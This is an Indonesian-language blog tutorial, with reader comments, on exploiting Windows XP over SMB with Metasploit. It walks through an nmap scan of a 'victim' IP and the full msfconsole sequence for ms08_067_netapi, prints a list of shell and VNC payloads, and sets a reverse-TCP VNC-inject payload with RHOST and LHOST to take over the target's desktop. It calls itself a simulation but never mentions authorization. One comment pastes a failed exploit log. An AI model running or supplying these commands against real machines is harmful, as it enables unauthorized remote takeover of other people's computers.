3
1.Metasploit versi berapa z, karena sekarang udah versi 3.3 maka kita akan
memakai versi baru tersebut tool ini bisa di download di http://metasploit.com
2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya
4.Ip dari komputer korban ( 192.168.2.78)
pertama install metasploitnya, klo di mikocok tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya
./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)
klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).
pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc teman, klo gw sih sering maku
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya
( simulation on Mikocok )
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 452 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7628 updated 6 d
msf >
kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap
nmap -v -O -p445 192.168.2.87
command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya
ketikan di jendela msf(metasploit)
show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan
karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah
dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show PAYLOAD
TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager
ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload
windows/vncinject/reverse_tcp
setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp
setelah itu kita set ip dari target
set RHOST 192.168.2.87 -----> komputer korba
set LHOST 192.168.2.2 -----> komputer kita
klo udah selesai kita tinggal launch exploit di msf
tinggal ketik
exploit
tunggu setelah selesai, akan muncul jendela desktop dari komputer korban.
kita tinggal remote komputer
3Awesome Comments!
tessss
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] 192.168.1.70:445 - Automatically detecting the target...
[*] 192.168.1.70:445 - fingerprint:Windows 7 - service pack 1 - lang:unknown
[*] 192.168.1.70:445 - we could not detect the language pack, defaulting to english
[-] 192.168.1.70:445 - Exploit aborted due to failure: no-target: no matching target
ini gimana kok gak bisa di exploit?
articles copas aja kw tanyain gan toh yg di tanya juga bingung:v